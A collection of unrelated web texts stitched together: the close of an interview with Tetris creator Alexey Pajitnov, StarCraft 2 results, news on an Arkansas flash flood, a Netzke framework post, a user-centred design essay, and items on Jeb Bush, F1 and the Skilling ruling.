Did you find it interesting when you started to see these evolutions of Tetris , building on your ideas and coming out ?
Was that surprising ?
AP : Oh , absolutely .
Besides those , I saw lots of pirate versions and lots of kind of amateur versions .
Some of them had some kind of promising ideas inside , but I do n't know ...
Unfortunately , none of those versions come close to the original .
I do n't know what the reasons were .
[ laughs ]
That 's something really hard in general -- when a game is simple but deep .
To add onto that foundation , I think , is really hard .
I think it 's something difficult with the puzzle genre in general , even when the original creators are working with their own game , if you look at sequels to puzzle games .
AP : Yeah .
Usually , it 's really hard to seriously improve an original idea , but that 's the phenomena which are hard to explain .
But yes .
That 's what happened .
But I think in other genres , like in movies , I could barely remember a good sequel to a good original movie , as well .
I think with more complicated games , it 's a lot easier to make a sequel because you 've got a lot more elements to work with .
I mean , look at what PopCap does what Bejeweled .
AP : Well , I do n't know how , but the very original version was demonstrated a brilliant idea of the game , but it had really bad implementation .
So , I really enjoy the later implementation of Bejeweled .
They had really good improvement , but they did n't improve the original concept , of course .
I was thinking back to the old versions of Tetris , and the Atari Games one , that arcade one , really capitalized on the Russian theme .
You know , and it also had the backwards R , which is supposed to look like Cyrillic .
Do you think that the Cold War mentality of the era , right around the softening of the Cold War , do you think that helped the popularity -- that people had an interest in Russia ?
AP : Yeah .
Yeah , that was kind of a coincidence at that time .
The interest in Russia was really high , and the fact that they decorated it in kind of a Russian style really helped to the marketing of the game .
But it was n't essentially ...
I did n't really care [ laughs ] what kind of decoration they put on it .
At the time , you did n't have any sort of oversight .
Now , you say , you definitely evaluate the versions , but at the same time , you did n't have any control , I 'm guessing .
AP : Well , if something was obviously wrong , I could object , but yeah , that 's right .
I did n't participate in any of those kinds of developments .
Well , I mean , communication was , I 'm sure , very hard to get out especially before the actual dissolution of the USSR .
AP : Yes .
Yes , but ... the version was okay , the design was pretty good , so people ... the designers , they liked the game and they did their best for the decoration of it , so most of the time I was satisfied with their work .
I think it 's probably because they had a fundamental respect for the game .
AP : Yes .
I agree with you .
So , generally , I noticed through my career that if the game is good , the concept of the game is good , and if the people who work on it like it , they are doing a really amazing job from their part , and that 's how the good games are coming out .
The game industry has changed tremendously since the game was originally released , and we 're at the point now where there 's a huge proliferation of platforms -- mobile , online , consoles , handhelds .
From your perspective as a creator , how do you see the market today ?
AP : I am very pleased with what 's going on because I love games , and I 'm very pleased that human beings are playing much more these days than it was in days of my young years , you know .
So , I feel that gaming is much better entertainment that movies , television , and reading because it 's really active .
Still , though , the industry is not in a very mature stage , and I 'm pretty sure it will be a really great future in the nearest time when the more serious kind of creators will get involved , and more engineering and software achievements will be applied to games .
But still , it 's tremendous progress with the industry , and it 's very pleasant for me to observe it .
When it comes to your personal taste and interest in games , are you mostly interested in puzzle games like Tetris , or do you look at the wide variety of stuff that 's out there right now ?
Because there 's a huge range of stuff available .
AP : Well , I 'm not very involved in the kind of heavy action games .
I never was , so it 's not my genre .
I 'm still in love with all the puzzles and casual games .
That 's my favorite genre for all the time .
I really enjoy what 's going on there .
But it 's very interesting stuff in multiplayer as well .
So , finally games start to be a medium which joins people together , which is a very important social role of the game .
I 'm playing World of Warcraft and enjoy it .
[ laughs ]
Speaking of multiplayer , obviously the original version of Tetris was n't multiplayer .
Other people came up with ways to make Tetris multiplayer through new versions .
Some were good , some were not .
Did you ever give that thought yourself ?
AP : Oh , absolutely .
We are working on multiplayer versions for more than 10 years -- I 've been trying to design it .
I should admit that we are not quite there yet .
It 's interesting because it 's such a simple game in terms of its mechanics .
AP : Yeah .
It was quite a problem with Tetris that ... the game is very intense , you know ?
If you play on the high level -- and that 's where you want to play usually .
So , you play on the edge of your abilities , in terms of the speed and reaction , and everything .
So , you kind of have no brain resources to observe what the other people are doing .
AP : Yeah .
That 's the kind of measured theoretical problem which we need to resolve with multiplayer Tetris .
So , if we lower the intensity of personal game playing , we , a little bit , lower the excitement of the game .
But if we keep it at the same level , the players do n't have resources to really do some kind of multiplayer actions , to observe , to analyze what 's going on in the big picture , and adjust their strategy .
So , we have been seated on this problem for a while ; that 's the brief description of it .
But there are still very promising ways to do it , so the version we have now is pretty good .
I mean , when you send the garbage in the multiplayer to the other player , it kind of works .
But unfortunately , my dream would be the game , when you could really see what the other people do and take their gameplay and their achievement and their status in the game really in account .
That 's what the main joy of a multiplayer game is , in my opinion .
I was reading an interview with David Jaffe , the original creator of God of War , in the new EGM .
He 's talking about the fact that , while there 's a great proliferation of multiplayer games right now -- to simplify what he 's saying -- they all tend to be very similar .
They only touch one aspect of multiplayer , and there 's room to grow .
So , I get the sense that you 'd like to open up a new avenue , maybe , a new way for people to look at multiplayer , with the mode that you 'd like to make .
AP : Exactly , because it should be not the mechanical or formal kind of joy for people in the game ; they should really share the joy of the game , and really help each other or really find each other .
I mean , not just doing what they do but look at what the opponents do .
That 's my point .
I think that social games like Facebook are sort of working on that , but I think the interaction is pretty shallow still .
AP : Well , we have no rush , I think .
Eventually , we 'll move to there .
[ laughs ]
It 's not so much about technical limitations as it is about evolution of design , do you think ?
AP : Absolutely .
Games are much more psychological product rather than technical .
I knew it for my entire life .
That 's what helped me to stay in the industry .
[ laughs ]
[ laughs ]
Now , are you working on this with your own studio ?
Or is it just you working on it ?
AP : Well , for the last five years , I am not engaging in work very intentionally , in staff .
I am kind of on early retirement .
[ laughs ]
I just do it for my own joy , time to time .
That 's kind of cool , though .
Does it free you up to do it at your own pace and to sort of just make the logical leaps rather than feel the pressure ?
AP : Yes , exactly .
That was my goal .
For many , many years of intensive work , and finally , I got to that point .
Do you think that having more freedom to explore concepts would allow the evolution of games ?
Having more time ?
Usually things are made on a product cycle -- 18 months , typically .
AP : Well , yes .
it really liberates your mind and probably ...
I will be able to come up with something really cool in the future , yes .
[ laughs ]
I have Tetris on my iPhone , and I bought the original Game Boy in 1989 with Tetris .
Everyone has bought multiple versions of Tetris in their life , I think , at this point , over the years .
It 's kind of a must - have .
AP : [ laughs ]
Good !
Do you enjoy playing with your finger , without a keyboard ?
I like it better with the regular control , honestly , than the touch control .
AP : You 're much more safe with your movement .
Well , you know , because you 're moving in the cardinal directions .
AP : I feel like the iPhone is a really good version .
They did a great job .
But I still have some [ reservations ] .
I 'm not certain that with my tap , the piece will be turned , you know ?
[ laughs ]
It was a little bit more slow than when I play with the regular keyboard .
I think we 're learning as the iPhone sort of takes off , while the touchscreen interface is great , it 's not 100 percent suited to everything .
AP : Well , yes .
I feel the version is great .
I really enjoy it .
But still , if you ask me , what platform I would prefer to play , I 'm still on computer .
Not Game Boy ?
AP : No , mostly on computer .
Game
Boy is fine , but you know , I lost it many , many years ago .
I have the DS version as well , so that 's kind of the same area .
For me , Tetris was always synonymous with the Game Boy .
It stayed with it all the time .
AP : I agree , yes .
Do you have a good relationship with Nintendo , still ?
AP : Absolutely .
Yes .
We do , and recently , we had a very good Wii version of Tetris .
What 's really overwhelming was the different variety of the game , and the core game is very good .
So , yes , we 're fine .
---
Image of Alexey Pajitnov on page 1 taken from Wikipedia , originally created by Flickr user Eunice Szpillman .
Used under Creative Commons license .
Return to the full version of this article
Copyright © UBM
Tech ,
All rights reserved
Europe vs Asia Starleague - The Aftermath
The Europe vs Asia Starleague hosted by 178.com and Gosugamers has concluded and the entire series was well fought by both sides .
HayprO 's roaches attemp to break Maka 's front in game 2 of their series
Europe vs Asia
Full Tournament Set Saturday , 05/15
ZpuX 1 - 3 Ace VODs
Strelok 1 - 3 Check VODs
Sunday , 05/16
HasuObs 1 - 3 Dayfly VODs
White - Ra 2 - 3 Sen VODs
Saturday , 05/22
NaNiwa 1 - 3 Eric VODs
TLO < Sen VODs
Sunday , 05/23
ZpuX < Dayfly VODs
TheLittleOne > Loner VODs
HayprO < Gerrard VODs
Saturday , 05/29
Strelok 3 - 1 Eric VODs
Nazgul 3 - 1 Check VODs
White - Ra 3 - 2 Maka VODs
Sunday , 05/30
Nazgul < Gerrard VODs
Saturday , 06/05
HayprO 3 - 2 Maka VODs
Final Standings Europe 5 - 9 Asia
With a strong , star studded lineup on both sides , the Europe vs Asia Starleague began with a roar as ZpuX took on Ace for the first game in the event .
In the first two weeks , Asia took a decisive advantage over Europe , however TLO , being one of the best SC2 gamers today gave the European team a flash of hope , taking the first win for Europe in his game against Loner .
In the following week , Europe played an amazing set of matches and was able to win three games in a row off of Asia .
However Asia returned with another set of spectacular Starcraft , and was able to solidify their lead with two more games after Europe 's three game streak .
With the score at 4 - 9 , HayprO was able to give the European team one last hurrah , as he plays an epic series against the Korean gamer , Maka in the last set of the Europe vs Asia Starleague ; with the final score coming in at 5 - 9 , as Asia takes the tournament .
The players who won for Asia took home € 50 for each match they won , and an additional € 50 for being the winning team .
We strongly recommend you to watch the VODs if you have n't seen the games already .
We would also like to give both Day [ 9 ] and Gretorp a big thanks for their very professional and entertaining casting !
[ Updated at 2:21 p.m . ]
At least 16 people died at an Arkansas campground after heavy rain and flash flooding , and many more could be trapped in the area , state authorities said .
Read full CNN.com story
[ Updated at 2:21 p.m. ]
Emergency management officials in Arkansas said on Friday that at least 14 people have died in the flash flood there .
[ Updated at 1:24 p.m. ]
Arkansas Gov. Mike Beebe told CNN there 's word from the Red Cross that there could have been as many as 300 people in the rugged area of western Arkansas , but he said there is no registration that would show the precise number of people in the region - which is in the Albert Pike campground area .
Beebe said the water of the Little Missouri River rose from about 3 feet Thursday night to more than 20 feet early Friday in the U.S. Forest Service campground .
" It was a very rapid flash flood that inundated that area , " Beebe said .
" It 's an unmanned campground in terms of being a campground with all the amenities . "
He said rescue crews on foot , in helicopters , and in vehicles were combing the area .
He said law enforcement , National Guard and parks personnel were working on the search - and - rescue efforts .
i Report : Are you there ?
Send photos , videos
[ Updated at 11:33 a.m. ]
Two helicopters are searching the area of an Arkansas campground where heavy rain and flash flooding has left at least 12 people dead , a spokesman with the Arkansas State Police told CNN .
" We believe there are still people trapped in the area , " Arkansas State Police spokesman Bill Sadler said .
Sadler said the department 's main goal at this point is to " locate and assist in rescuing the living and pinpoint where other bodies " are .
He said helicopters were needed because the area around the Albert Pike campground in western Arkansas has several camping areas and is extremely rugged and remote .
Sadler said officials are working with local volunteers who know the area well and a temporary morgue has been set up in the area .
Sadler said the floodwaters are expected to recede throughout the day and officials expect the search will be an ongoing effort all day .
" It 's going to be later today before we 're confident we 've got the living out of the area , " he said .
CNN affiliate KARK is reporting the National Guard was asked to provide a a UH60 Black Hawk helicopter for the rescue , but it has not been able to take off yet because of weather conditions .
[ Updated at 11:20 a.m. ]
At least 12 people died at an Arkansas campground after heavy rain and flash flooding , state police said Friday .
[ Posted at 11:17 a.m. ]
At least six people died at an Arkansas campground after heavy rain and flash flooding , a Polk County sheriff 's officer told CNN on Friday .
Sudden rain put as much as 3 inches of rain in one hour in the area and the floodwaters went through the campground , which only has one access road , Officer Cindy Martin with the Polk County Arkansas Sheriff ’s Office said .
She said the rain was so bad it wiped out phone service in parts of Howard , Pike , and Montgomery counties .
Martin told CNN there are still a “ bunch of people still missing ” in the area .
next time you invite cthulhu over for a little 4e make sure you check out what he ’s working with over there
none of his dice remotely meet the standards for what you and i would call closed solids , let alone a good old d20
he rolls in here with stats you ’ve never even heard of .
since when do you rank atrocity up there with dexterity and wisdom , what class even uses that
what a doucher , he ’s barred from my games ever since he imprisoned me on the plateau of leng for telling him he already used his daily
Netzke : Rich Internet Apps with Ext JS and Rails
Ext JS is a cross - browser JavaScript library for building rich internet applications .
It provides an extended set of powerful , feature - rich widgets that can be used as building blocks for AJAX - driven GUI of almost unlimited complexity .
Netzke is a framework that provides a unified way to build clean , reusable and maintainable back - end code for an Ext JS app in Rails .
A good example of a Ext JS widget that depends heavily on client - server communication is a grid panel .
It provides a convenient GUI for multi-line CRUD operations , as well as for the searching , filtering , and pagination of the data .
Configuring an Ext JS grid panel in JavaScript will take quite some time even if you ’re an experienced Ext JS developer - it 's tedious work !
How about using a lot of grid panels ( normally bound to different database tables ) all throughout your application ?
You soon realize , that not only your JavaScript code for those grid has to become reusable in some way , but also the server - side code ( that responds to all the grid panel ’s AJAX calls ) , will grow very quickly in a not - so - DRY manner .
This is where Netzke shines .
It abstracts both client - and server - side code into components .
By definition , components are reusable , isolated and configurable pieces of code with a well - defined functionality .
A Netzke component ( a “ widget ” ) is a Ruby class that “ knows ” how to build and instantiate its JavaScript part ( used in a browser ) , as well as how to respond to AJAX calls coming back to the server part .
All communication – while being done over the Internet – happens “ within ” the component .
Do you want to put several grid panels on the same web - page ?
Or maybe you want to dynamically load another grid in a modal window ?
While sharing the code ( both JavaScript and Ruby ) , each of the grids will talk to its own instance , managing a separate ActiveRecord model if needed .
See it in action here .
Netzke GridPanel widget is only one example of what can be done with the Netzke framework .
Its philosophy is the following : create a widget once ( you ’ll need Ext JS knowledge for that , of course ) , and then reuse it all over again ( or share it with the others ) , without the need to write JavaScript anymore .
Besides ,
Netzke components are easily extendible , just use OOP : inheriting from Netzke : : GridPanel provides for automatic prototype - based “ inheritance ” on the JavaScript level , too !
Combining several widgets into a compound widget is also no problem .
The netzke - basepack project contains a set of pre-built Netzke widgets that can be used as basis for your RIA .
And if you like to know more about different aspects of Netzke , browse through a number of tutorials on the WriteLessCode blog
This post is by Sergei Kozlov .
Tweet This Post
He gives Mr. Obama credit for trying to spur innovation in public schools , a policy area about which Mr. Bush is passionate , but his admiration ends there .
Image A lot of Republican Party insiders think Jeb Bush could still be a serious presidential contender in 2012 .
Credit ... M. Spencer Green / Associated Press
“ By and large , I think the president , instead of being a 21st - century leader , is Hubert Humphrey on steroids , ” Mr. Bush said .
“ I do n’t think there ’s much newness in spending more money as the solution to every problem . ”
Though he headlines the occasional fund - raiser around the country , Mr. Bush has exercized his political influence this year largely out of the public view .
He has been deeply involved as an informal adviser to the party ’s candidates for governor , whom he sees as the most likely sources of new Republican policy ideas .
“ It does n’t seem like it ’s going to be happening in Washington anytime soon , ” Mr. Bush dryly observed .
No matter what happens in November ’s midterm elections , Republicans will have to make a difficult calibration as they head into the presidential season .
The party needs a messenger who can keep its Tea Party - type activists energized behind an agenda and a nominee .
But Republicans will also be looking for someone who can reposition the party nationally and make its more strident ideology palatable to the wider American electorate .
This explains why some influential Republicans persist in believing that Mr. Bush might still make a strong candidate in 2012 .
He is a favorite of the anti-establishment crowd ( he is said to have mentored Marco Rubio , the Senate challenger in Florida who gave the Tea Partiers a national lift ) , but he is also a political celebrity with a pronounced independent streak .
As governor , for instance , Mr. Bush strongly opposed drilling in the shallow waters off Florida , and he favors increasing legal immigration , rather than restricting it .
Mr. Bush says he has no interest in running , because he wants to make money for his family , but his political allies seem to read a “ for now ” into such statements .
“ Every presidential wanna - be and every member of the House and Senate I talk to , if you ask them who is a difference - maker in our party , they will tell you Jeb Bush , ” said Al Cardenas , the former party chairman in Florida .
Washington wisdom  such as it is  holds that the real impediment to Mr. Bush ’s political future would be the Bush brand , which has taken a pounding both inside the party and out .
Neither George W. Bush nor his father ranks among the more successful presidents of our time , to put it politely .
Hi ! I ’m Thomas .
I live in New York & founded First Principle .
Square , 80/20 & Hello alumni .
I created GhostNote , WeekendHacker , FinalTouch & PinView , .
You can connect with me @hello_world or mail me at thomas .
petersen on gmail .
Essay
Getting to the Customer – Why Everything You Think about User - Centred Design is Wrong
Let me ask you a question .
If you had an idea for a new hammer and you wanted to test it , which of the following ways do you think would yield you the most valuable feedback ?
I am guessing most of you would choose # 4 .
After all , getting a feel for the hammer requires the customer to actually try it out .
Looking at a picture of a hammer , cutting it out , or even providing a Styrofoam prototype simply wo n’t provide you or the customer with sufficient foundation on which to evaluate it .
However , if I asked you to test a digital product , whether it be a website , an application or an e-commerce site , most of you would choose # 1 , 2 or 3 .
Is n’t that odd ?
A simple product like a hammer is best tested in its final form .
But a digital product , that in some ways is much more complex , is tested by lesser means , as if you could extract important feedback about the hammer .
Nonetheless , this is the current reality of applied UCD , or User - Centered Design .
Usability tests , focus groups and personas to name a few , all are intended to increase usability , and create better products by having users test them .
There is something flawed in this approach .
What is wrong is that it does n’t deliver on that promise .
Valuable resources are being used on what one could arguably call a placebo for uncertainty .
Clarification : Some people have commented on this .
I am not saying that you should n’t do 1 , 2 or 3 .
I am saying you should n’t test 1 , 2 or 3 on users — you should , though , go as far as 4 and then test as much as possible .
Correct theory , wrong application
Now , there are many different interpretations of UCD .
Is it a theory , or a process , or both ?
Wikipedia states :
“ In broad terms , user - centered design ( UCD ) is a design philosophy and a process in which the needs , wants , and limitations of end users of an interface or document are given extensive attention at each stage of the design process .
User - centered design can be characterized as a multi-stage problem solving process that not only requires designers to analyze and foresee how users are likely to use an interface , but also to test the validity of their assumptions with regards to user behaviour in real world tests with actual users .
Such testing is necessary as it is often very difficult for the designers of an interface to understand intuitively what a first - time user of their design experiences , and what each user ’s learning curve may look like .
The chief difference from other interface design philosophies is that user - centered design tries to optimize the user interface around how people can , want , or need to work , rather than forcing the users to change how they work to accommodate the software developers approach . ”
Does n’t sound too bad , does it ?
In theory , it makes a lot of sense .
Getting feedback from users about your product will provide you with valuable insights as to what works and what does n’t .
The users are , to state the obvious , the ones who are going to be using it , so their input is going to be valuable .
It ’s also a correct assumption that designers , in theory , cannot foresee how users are likely to use an interface , thus their assumptions must be tested .
A long learning curve is clearly an issue when it comes to getting users to adopt your product .
It needs to be easy to sign up , log in , buy , navigate , understand , and utilize what your product offers .
Too often the software determines the option space of designers , forcing them to design less than optimal solutions .
So , in many ways , there is no problem with the philosophical definition of UCD .
Involving users is critical if you want your products to be used .
No , the devil is in the actual practical outcome of this philosophy — what I call applied UCD .
Here is a typical UCD process for web or application design .
( source : http://www.w3.org/WAI/EO/2003/ucd)
Have a look at the model again .
Look at the last two parts of the process .
Yes , you got that right .
Generally there is n’t much to say about implementation and deployment from an UCD point of view .
It ’s normally not considered part of the process .
On the contrary , it is most often assumed that , once you have gone through the process of choices 1 , 2 and 3 , the UCD process is complete , and you have established a solid solution .
So , as you can see , a typical UCD process , to define it in terms of our hammer test , is based on testing the drawing , the cutout and the Styrofoam hammer — not the actual hammer .
So why is that ?
How come something that appears such an obvious problematic implementation of the goal of UCD , has become the norm ?
I believe there is a series of reasons for this , that I will attempt to cover here .
Waterfall process
Historically , development of digital products has been based on the waterfall method .
This made it very expensive for organizations to change things once the product was deployed .
So , with UCD promising to test the usability and relevance of the product before it went into production , it ’s no wonder it gained so much traction in the 1990s .
UCD has its origins in academia , not in design or engineering
With heavyweights such as Jakob Nielsen , Jared Spool and Don Norman ’s extensive and fantastic research , it ’s easy to see why UCD has gained traction .
There is an answer to almost every question or problem you can devise .
Facts provided about users are based on years of research .
Most UCD proponents and practitioners are academics
It ’s easy to see why the usability community has picked up on this research and why they consider it more valuable than , say , theory of typography or grid structures , color theory , engineering , animation , programming or development process , or even marketing .
It ’s a continuation of the academic process they know so well , no matter their original domain .
‘ Get out of jail free ’ card
As I mentioned in an earlier post , most large and management - driven organizations do n’t allow for mistakes .
They religiously demand certainty , and consequently punish uncertainty .
If you do n’t have your back covered , if your project tanks , you are headed for trouble .
UCD is the perceived guarantee that your product has been tested thoroughly by way of user tests .
Managers use this as a way to get some of the responsibility outsourced .
The user ’s advocate
Humans are not just machines .
We aim to serve higher goals .
Many usability experts see themselves as advocates for the user .
There is a sense of purpose greater than just “ doing the work ” within the UCD community .
It has created a strong sense of purpose , and a strong , almost moral culture around users .
With the above in mind it ’s not difficult to understand why UCD has gained such success the last decade .
With both extensive research , great academic minds , economic incentives , get out of jail free cards and a sense of certainty , it ’s a sure sell .
Why should companies not want to utilize UCD to design better and more usable products ?
The following observations may make this more evident .
Customers are not users
The first issue is with the term user .
It might seem like a rhetorical nitpick but it speaks volume of one of the main issues and misconceptions with applied UCD .
Users are of statistical value meaning , i.e. , what we know of users we know through the research that has been done on them .
Users are of relevance to the field of usability , but not to the field of product design .
It has no actual reference to whether a product will gain adoption or not .
Users are not customers
A customer is someone who , through all the noise of competition , has chosen your product over someone else’s .
What might be a no - go from a user ’s point of view ( statistical ) might not be a no - go from a customer ’s ( utilitarian ) point of view .
What matters is that you design for the customers of the organization instead of the users of your ideology .
If you design for users , you end up spending a lot of time on pseudo problems that might have ideological value but no implication for the adoption of a product .
According to studies by J.Nielsen , users do n’t scroll .
Although this might be the case from a statistical point of view , it is certainly not of pragmatic value .
Maybe what was tested was not relevant enough to make the user to want to scroll .
Maybe the design was executed in a way that obscured the fact that you could scroll .
In fact , users scroll more than ever , yet this myth is continuously being upheld .
If you design for customers , you are forced to think about how to benefit the relationship between the customer and the organization .
If you design for customers , you design for the jobs they are trying to do .
You are designing for an optimal solution , not necessarily a perfect solution .
Be the advocate for the customer relationship , not for the users .
The map is not the territory
We can draw up as many plans , diagrams and projections as we wish .
A product before it ’s launched is not a product yet .
It ’s a set of ideas , sketches , designs and assumptions , maybe even some patent - pending technology .
It ’s a map of how the designers envision the product .
But it ’s not a product .
It has no actual form ; it does n’t belong to an ecosystem ; the user can only think about how it might work .
In short , it does n’t contain any of the qualifiers that make a product a product .
So the kind of feedback that UCD provides before and after deployment is not the same .
They are two very different paradigms .
One is a paradigm of ideology and thus provides information of theoretical value .
The other is a paradigm of application and utility , and provides real - world , real - time feedback .
Pseudo environment
What you are solving in the wireframe phase are problems inherent in the wireframe phase , not problems with the product .
What you are solving when testing the prototype are problems inherent in the prototype , not in the final product .
There is only one true test and that is the final product .
Only then will you start to receive valuable feedback in combination with quantitative feedback .
You will get it from where it matters most .
No transcendence
By this I mean there is no quality transfer from insights you establish in the testing of your product into the design and development phase .
One reason as already stated is that problems are addressed in a pseudo environment instead of an actual one .
Another reason is that what makes products successful and usable is only really obvious in the final form and environment .
With UCD notorious for dealing with the product before implementation and deployment , it relies on the assumption that it can solve problems before they arise .
It relies on the assumption that , by fixing the usability issues , your product will have a greater chance for success .
This is , quite simply , wrong , and flies in the face of reality .
Intuition is neither objective nor always the goal
Intuitive behavior is not an objective standard .
It ’s a slow - moving target .
If something becomes the default way of doing something , then it has become the intuitive way of doing it .
You do n’t need to test for that ; you use design patterns .
They are the product of the norm .
Some of the most successful products were n’t intuitive to begin with .
They became intuitive after the product gained sufficient popularity .
So , even if a product fails the intuitive test , it does not impact whether or not it becomes a success .
Usability studies and focus groups are for refinement , not for innovation
Again , the problem is in thinking in terms of users instead of customers .
Something might fail being intuitive or make sense from an ideological point of view , but it still helps customers do a job that makes them ready to endure the learning curve .
Therefore , forcing a user - centric model to evaluate your ideas can be completely damaging to your assessment of your product ’s likelihood of success .
When you test your product , whether by focus groups or user tests , many other factors determine the outcome of a session .
Social dynamics , groupthink , the “ dumb ” expert , and dealing with a product in the abstract .
Implementation is a black box
When most companies exercised waterfall methodology , UCD had some value .
But , today , the landscape is different .
Implementation is part of the design process .
With agile , continuous integration and continuous deployment methodologies , and the speed at which products appear , no longer is there room or need for lengthy processes that only obfuscate the goal of making good solutions through the division of UCD phase and the implementation phase .
Good UCD processes mean good products
Well , no , unfortunately , this is not the case .
Successful products have nothing to do with the process as such .
A good process merely allows you to cover what needs to be done .
It allows you to collect the necessary data and create the structure of your product , to map out what needs to be done , who should do it , and in what order it needs to be done .
Putting users into the process after research and before the final product is finished provides primarily pseudo value .
It confuses users with customers , and is responsible for valuable time being wasted in a pseudo environment tackling pseudo problems that have no bearing on those you may find yourself with after the launch .
However , at that point it ’s too late , since applied UCD normally leaves the building right before the implementation starts , and where the product really starts to take shape .
This is where UCD really fails .
What is required to create good products is not the ability to test your idea or the usability with users .
What is necessary is testing the finished product with customers and improving it from there .
This requires a different approach to thinking , and a different set of skills .
Testing users is about testing the current state of usability and intuition .
This belongs to the type of research that people like J.Nilesen , J.Spool and others perform so well .
It contains a lot of valuable knowledge and should be the foundation for anyone wanting to do UCD .
But testing customers means getting the product in their hands , and learning how it behaves ; to pinpoint problem areas and then figure out ways to improve it .
It allows you to test the actual problems instead of a number of pseudo problems that may never arise .
Summing up the problem with applied UCD
Applied UCD has wedged itself into a corner from which it will be difficult to extricate itself .
It must extricate itself if it wants to remain relevant .
On one hand , UCD is as successful as ever ; the area is very well covered .
Lots of research and lots of value have historically come out of this area — understanding the users is important .
On the other hand , it has become successful on the wrong premise .
Too often , it is used simply to push responsibility away from those who should have it .
And when it ’s not , it ’s being misapplied for some of the reasons mentioned above .
It ’s being perceived as providing certainty where none really exist .
The speed at which products , services and applications are being launched today is increasing rapidly .
There is more competition , but , also , products are built and iterated much more rapidly than they once were .
And with the move away from waterfall methodology , the consequence is that UCD proponents and practitioners need to rethink just where it is in the process they see themselves adding value .
There is nothing today that hinders a process in which products are launched before they are tested and then iterated if necessary .
A revised UCD process would look something like this :
In this way , users become customers , giving you the opportunity to test where it matters with valuable feedback .
This will no doubt mean that many have to re-educate themselves , and rethink how they approach design , whether it be UX , IA , UI or GUI .
Nonetheless , as stated , it is necessary to stay relevant for the future .
A pivotal part of this will also be to re-educate clients and help them understand they must look at at product design a little differently .
Design is a decision , not a democracy .
If you are serious about using design strategically , then courage is the strategic advantage you should aim for .
With the ability to quickly adjust wrong assumptions , it ’s not about risk , just common sense .
If you want to see how to get to the customers before you start testing , look at another post of mine .
Here I try to give some principles for designing digital products .
Let me know what you think .
A 20 - year - old Romanian man is lucky to be alive after he was discovered hidden inside the rear wheel compartment of a jet arriving this week in London .
The stowaway , who was apparently looking for work , braved low oxygen and outside air temperatures during the flight as low as 40 below zero .
Upon his discovery at London ’s Heathrow Airport , he was covered in bruises and showing signs of hypothermia , but thankfully still alive .
How exactly did a man manage to sneak inside a plane ?
And how did he make it through the experience ?
It turns out through a remarkable mix of luck , daring and stupidity .
The man apparently climbed under a fence at Vienna ’s Schwechat airport , hiding himself beneath a private jet that had been parked there since last week .
He also lucked out with the flight plan – the plane had to fly at a lower - than - normal altitude to avoid bad weather , allowing the man to survive what would normally be a fatal combination of cold and lack of air .
UK authorities were surprised by the man ’s unexpected arrival , though they declined to press charges .
As Romania is part of the European Union , the “ passenger ” was technically allowed to visit on holiday .
He was cautioned and freed with no further action .
Frankly , this traveler is lucky to have survived the ordeal , let alone gotten off without legal action .
Next time you ’re ready to complain about that horrible experience on your last flight , you might want to think again .
Somebody out there has definitely had it much worse .
( Image : Flickr / Lili Vieira de Carvalho’s )
Fernando Alonso led race winner Lewis Hamilton during the Canadian Grand Prix
Fernando Alonso has warned rivals not to write off Ferrari ahead of the second half of the Formula 1 season .
The two - time world champion says that Ferrari 's updates for next week 's European Grand Prix in Valencia are only the start of a concerted push .
" We will have further developments for England and Germany , " said Alonso .
" Valencia is not a last - ditch effort . "
The Spaniard lies just 15 points - the same as a third - place finish - behind championship leader Lewis Hamilton .
But Ferrari's pace has been disappointing this season since Alonso won the season - opening Bahrain Grand Prix on his debut for the team .
Last weekend , however , the Montreal circuit used for the Canadian GP , suited the Ferrari F10 far better , allowing Alonso to fight for the lead and eventually finish third .
I 've said it before and I 'll say it again now : this is a stage event , and the final one of those stages will not come until November in Abu Dhabi
Fernando Alonso
The Valencia city circuit has some similarities to Montreal ; it has long straights and relatively slow corners , playing to the Ferrari 's existing strengths of mechanical grip .
But a major breakthrough on aerodynamics has excited the team , and is due to feature on the F10 for the first time in Valencia .
The new development uses exhaust gases to move the airflow around the diffuser and rear beam wing more effectively .
The concept is believed to be the key to the Red Bull RB6's stunning pace in fast corners this season .
In his blog on Ferrari 's website , Alonso said : " We will have major updates on the F10 which I hope will allow us to up our performance level .
" Following on from that , we have further developments in the pipeline which should arrive for England and Germany , which is to say that the European GP is simply the ninth round of the championship , not a last - ditch effort for Ferrari , which I heard some people saying .
" I do n't see how they can say that given that we have not even reached the halfway point of the [ 19 - race ] season , and that after Valencia there will still be 10 Grands Prix to go .
" I 've said it before and I 'll say it again now : this is a stage event , and the final one of those stages will not come until November in Abu Dhabi .
Things can change very quickly . "
Ferrari are said to have been staggered when they saw in the wind - tunnel just how much this feature improved things
Mark Hughes on Ferrari Alonso said the team 's mood had changed since the disappointment of being beaten by McLaren 's Lewis Hamilton and Jenson Button in Canada .
" The sense of disappointment that we missed out on a win has been replaced with the awareness that we did actually get a great result , " he said .
" We have to look at it as a glass half - full because on the Thursday we would have been satisfied with the thought of a podium finish .
" We were competitive throughout the whole weekend , both in qualifying and the race , which is very positive .
" In the first eight races of the season all sorts of things happened - mistakes , reliability problems , bad luck - but we are still in the thick of the fight for both championships [ drivers ' and constructors ' ] .
The same can be said of McLaren and Red Bull , who have also missed out on points along the way . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Okay , this is going to seem technical .
But if you care about public corruption prosecutions , you want to read this .
You probably saw yesterday that former Enron CEO Jeffrey Skilling won at least a limited victory before the Supreme Court .
But the decision actually — or at least potentially — goes way , way beyond Skilling ’s fate .
We ’re actually at work on a larger piece on this .
But I just wanted to flag briefly now that the case centered on something called “ honest services ” fraud which the Justice Department has repeatedly used in Public and Corporate corruption cases over recent years .
To put it very generally , the “ honest services ” theory allowed a much broader theory of criminal activity than those used in cases of bribery itself .
Basically , if I ’m working for the people of Kentucky and I ’m in effect in the pay of a private interest , I ’m depriving the people of the state of “ honest services ” even if the prosecutor cannot prove , narrowly speaking , that I took a bribe .
In short , it makes it much easier for prosecutors to make their case .
The Court unanimously decided to scale back “ honest services ” and the conservative wing ( Scalia , Thomas and Kennedy but not Alito ) wanted to get rid of it altogether .
If you ’ve followed TPMMuckraker over the last five years , I ’d venture to say that the majority , probably the great majority of the public corruption cases we ’ve covered relied in whole or in part on “ honest services . ”
So if it ’s been dramatically curtailed that could undermine a lot of convictions .
There ’s been surprisingly little commentary published so far on just how far - reaching the decision is , probably because it ’s a very complex decision and the experts are taking some time to digest it .
We ’ll bring you more over the course of the day .
BP is ponying up $ 20 billion for Gulf Spill oil damages .
And quite a few Republicans do n't like it one bit .
